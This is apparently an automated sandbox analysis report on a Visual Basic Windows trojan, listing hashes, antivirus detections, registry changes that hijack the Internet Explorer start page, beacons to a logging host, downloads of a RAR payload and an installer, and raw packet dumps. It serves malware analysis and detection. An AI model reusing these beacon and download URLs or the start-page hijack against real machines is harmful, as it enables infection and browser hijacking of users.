Analysis Date2014-12-16 00:18:28
MD59c821553c8ea98fa9c52c644f3ae30b3
SHA1b367d04f4bfa93ff1edef811fa33a5e873bb009f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8504e07c5b89a76b82f0b317ae29560d sha1: 6f63b74db14fbf006800601ebe5cc1d7fa634c60 size: 110592
Section.data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section.rsrc md5: 2f5edb93d1e1fc40b011b01b8da1ad9a sha1: 3f168477c2e350824f226f25563a0df12b0f0cd7 size: 4096
Timestamp2014-07-16 19:09:08
PackerMicrosoft Visual Basic v5.0
PEhashef10bb72629aba46686c330da5ea23890653e7d4
IMPhashe26d1ecd6916527db9516304d049ca0b
AV360 SafeGen:Trojan.Heur.ZGY.6
AVAd-AwareGen:Trojan.Heur.ZGY.6
AVAlwil (avast)VBCrypt-CWL [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.ZGY.6
AVAuthentiumW32/Trojan.GPEJ-3151
AVAvira (antivir)TR/Dropper.Gen
AVBullGuardGen:Trojan.Heur.ZGY.6
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Generic.r3
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Trojan.Heur.ZGY.6
AVEset (nod32)Win32/Paskod.A
AVFortinetW32/VBObfus.QT!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Trojan.Heur.ZGY.6
AVGrisoft (avg)VBCrypt.GDR
AVIkarusWin32.VBCrypt
AVK7Trojan ( 0049f5391 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesno_virus
AVMcafeeObfuscated-FBW!9C821553C8EA
AVMicrosoft Security EssentialsTrojan:Win32/Dynamer!ac
AVMicroWorld (escan)Gen:Trojan.Heur.ZGY.6
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend MicroTROJ_VB.SMIS
AVVirusBlokAda (vba32)BScope.Trojan.Diple

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
C:\Program Files\Internet Explorer\IEXPLORE.EXE "http://www.skoda-china.com/"\\x00\\x00\\x006\\x009\\x00-\\x00A\\x002\\x00E\\x00A\\x00-\\x000\\x008\\x000\\x000\\x002\\x00B\\x003\\x000\\x003\\x000\\x009\\x00D\\x00}\\x00\\\x00s\\x00h\\x00e\\x00l\\x00l\\x00\\\x00O\\x00p\\x00e\\x00n\\x00H\\x00o\\x00m\\x00e\\x00P\\x00
RegistryHKEY_CURRENT_USER\Software\VB and VBA Program Settings\up2\m3q\copin ➝
271648583079\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\101593.ini
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\101593.ini
Creates ProcessC:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\101593.ini"
Creates Mutexrunup1002
Winsock DNSlog.dtddn.com
Winsock DNS219.141.239.157
Winsock DNS122.228.228.7
Winsock DNSdldir1.qq.com

Process
↳ C:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\101593.ini"

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00

Network Details:

DNSlog.dtddn.com
Type: A
112.124.183.10
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.144
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.154
DNSdldir1.qq.com
Type: A
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20NUB%20251&Info1=271648583079%20262208%2073000
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20NUB%20251&Info1=271648583079%20262208%2076437
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20NUB%20251&Info1=271648583079%20262208%2079500
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20Q2-Beg1&Info1=271648583079%201%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20Q2-Beg1&Info1=271648583079%201%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20Q2-Beg1&Info1=271648583079%201%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://219.141.239.157:8880/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://122.228.228.7:8880/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20Q2-DownI&Info1=271648583079%201%200%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20Q2-DownI&Info1=271648583079%201%200%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog/worklog.asp?Name1=1002%20Q2-DownI&Info1=271648583079%201%200%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Flows TCP192.168.1.1:1031 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1032 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1033 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1034 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1035 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1036 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1037 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1038 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1039 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1040 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1041 ➝ 219.141.239.157:8880
Flows TCP192.168.1.1:1042 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1043 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1044 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1045 ➝ 122.228.228.7:8880
Flows TCP192.168.1.1:1046 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1047 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1048 ➝ 112.124.183.10:80

Raw Pcap
0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 4e554225 32303235 3126496e   2%20NUB%20251&In
0x00000030 (00048)   666f313d 32373136 34383538 33303739   fo1=271648583079
0x00000040 (00064)   25323032 36323230 38253230 37333030   %20262208%207300
0x00000050 (00080)   30204854 54502f31 2e310d0a 41636365   0 HTTP/1.1..Acce
0x00000060 (00096)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 3b205769    (compatible; Wi
0x00000090 (00144)   6e33323b 2057696e 48747470 2e57696e   n32; WinHttp.Win
0x000000a0 (00160)   48747470 52657175 6573742e 35290d0a   HttpRequest.5)..
0x000000b0 (00176)   486f7374 3a206c6f 672e6474 64646e2e   Host: log.dtddn.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 4e554225 32303235 3126496e   2%20NUB%20251&In
0x00000030 (00048)   666f313d 32373136 34383538 33303739   fo1=271648583079
0x00000040 (00064)   25323032 36323230 38253230 37363433   %20262208%207643
0x00000050 (00080)   37204854 54502f31 2e310d0a 41636365   7 HTTP/1.1..Acce
0x00000060 (00096)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 3b205769    (compatible; Wi
0x00000090 (00144)   6e33323b 2057696e 48747470 2e57696e   n32; WinHttp.Win
0x000000a0 (00160)   48747470 52657175 6573742e 35290d0a   HttpRequest.5)..
0x000000b0 (00176)   486f7374 3a206c6f 672e6474 64646e2e   Host: log.dtddn.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 4e554225 32303235 3126496e   2%20NUB%20251&In
0x00000030 (00048)   666f313d 32373136 34383538 33303739   fo1=271648583079
0x00000040 (00064)   25323032 36323230 38253230 37393530   %20262208%207950
0x00000050 (00080)   30204854 54502f31 2e310d0a 41636365   0 HTTP/1.1..Acce
0x00000060 (00096)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 3b205769    (compatible; Wi
0x00000090 (00144)   6e33323b 2057696e 48747470 2e57696e   n32; WinHttp.Win
0x000000a0 (00160)   48747470 52657175 6573742e 35290d0a   HttpRequest.5)..
0x000000b0 (00176)   486f7374 3a206c6f 672e6474 64646e2e   Host: log.dtddn.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 51322d42 65673126 496e666f   2%20Q2-Beg1&Info
0x00000030 (00048)   313d3237 31363438 35383330 37392532   1=271648583079%2
0x00000040 (00064)   30312532 30302048 5454502f 312e310d   01%200 HTTP/1.1.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000060 (00096)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000070 (00112)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000080 (00128)   653b2057 696e3332 3b205769 6e487474   e; Win32; WinHtt
0x00000090 (00144)   702e5769 6e487474 70526571 75657374   p.WinHttpRequest
0x000000a0 (00160)   2e35290d 0a486f73 743a206c 6f672e64   .5)..Host: log.d
0x000000b0 (00176)   7464646e 2e636f6d 0d0a436f 6e6e6563   tddn.com..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 51322d42 65673126 496e666f   2%20Q2-Beg1&Info
0x00000030 (00048)   313d3237 31363438 35383330 37392532   1=271648583079%2
0x00000040 (00064)   30312532 30302048 5454502f 312e310d   01%200 HTTP/1.1.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000060 (00096)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000070 (00112)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000080 (00128)   653b2057 696e3332 3b205769 6e487474   e; Win32; WinHtt
0x00000090 (00144)   702e5769 6e487474 70526571 75657374   p.WinHttpRequest
0x000000a0 (00160)   2e35290d 0a486f73 743a206c 6f672e64   .5)..Host: log.d
0x000000b0 (00176)   7464646e 2e636f6d 0d0a436f 6e6e6563   tddn.com..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 51322d42 65673126 496e666f   2%20Q2-Beg1&Info
0x00000030 (00048)   313d3237 31363438 35383330 37392532   1=271648583079%2
0x00000040 (00064)   30312532 30302048 5454502f 312e310d   01%200 HTTP/1.1.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000060 (00096)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000070 (00112)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000080 (00128)   653b2057 696e3332 3b205769 6e487474   e; Win32; WinHtt
0x00000090 (00144)   702e5769 6e487474 70526571 75657374   p.WinHttpRequest
0x000000a0 (00160)   2e35290d 0a486f73 743a206c 6f672e64   .5)..Host: log.d
0x000000b0 (00176)   7464646e 2e636f6d 0d0a436f 6e6e6563   tddn.com..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f37342e 72617220 48545450   GET /74.rar HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000030 (00048)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000040 (00064)   61746962 6c653b20 57696e33 323b2057   atible; Win32; W
0x00000050 (00080)   696e4874 74702e57 696e4874 74705265   inHttp.WinHttpRe
0x00000060 (00096)   71756573 742e3529 0d0a486f 73743a20   quest.5)..Host: 
0x00000070 (00112)   3231392e 3134312e 3233392e 3135373a   219.141.239.157:
0x00000080 (00128)   38383830 0d0a436f 6e6e6563 74696f6e   8880..Connection
0x00000090 (00144)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f37342e 72617220 48545450   GET /74.rar HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000030 (00048)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000040 (00064)   61746962 6c653b20 57696e33 323b2057   atible; Win32; W
0x00000050 (00080)   696e4874 74702e57 696e4874 74705265   inHttp.WinHttpRe
0x00000060 (00096)   71756573 742e3529 0d0a486f 73743a20   quest.5)..Host: 
0x00000070 (00112)   3132322e 3232382e 3232382e 373a3838   122.228.228.7:88
0x00000080 (00128)   38300d0a 436f6e6e 65637469 6f6e3a20   80..Connection: 
0x00000090 (00144)   4b656570 2d416c69 76650d0a 0d0a312e   Keep-Alive....1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a6f6e 3a204b65 65702d41 6c697665   ..on: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 702d416c 6976650d 0a0d0a     ....p-Alive....

0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 51322d44 6f776e49 26496e66   2%20Q2-DownI&Inf
0x00000030 (00048)   6f313d32 37313634 38353833 30373925   o1=271648583079%
0x00000040 (00064)   32303125 32303025 32303020 48545450   201%200%200 HTTP
0x00000050 (00080)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000060 (00096)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000080 (00128)   61746962 6c653b20 57696e33 323b2057   atible; Win32; W
0x00000090 (00144)   696e4874 74702e57 696e4874 74705265   inHttp.WinHttpRe
0x000000a0 (00160)   71756573 742e3529 0d0a486f 73743a20   quest.5)..Host: 
0x000000b0 (00176)   6c6f672e 64746464 6e2e636f 6d0d0a43   log.dtddn.com..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a76650d 0a0d0a     Alive....ve....

0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 51322d44 6f776e49 26496e66   2%20Q2-DownI&Inf
0x00000030 (00048)   6f313d32 37313634 38353833 30373925   o1=271648583079%
0x00000040 (00064)   32303125 32303025 32303020 48545450   201%200%200 HTTP
0x00000050 (00080)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000060 (00096)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000080 (00128)   61746962 6c653b20 57696e33 323b2057   atible; Win32; W
0x00000090 (00144)   696e4874 74702e57 696e4874 74705265   inHttp.WinHttpRe
0x000000a0 (00160)   71756573 742e3529 0d0a486f 73743a20   quest.5)..Host: 
0x000000b0 (00176)   6c6f672e 64746464 6e2e636f 6d0d0a43   log.dtddn.com..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a76650d 0a0d0a     Alive....ve....

0x00000000 (00000)   47455420 2f55704c 6f672f77 6f726b6c   GET /UpLog/workl
0x00000010 (00016)   6f672e61 73703f4e 616d6531 3d313030   og.asp?Name1=100
0x00000020 (00032)   32253230 51322d44 6f776e49 26496e66   2%20Q2-DownI&Inf
0x00000030 (00048)   6f313d32 37313634 38353833 30373925   o1=271648583079%
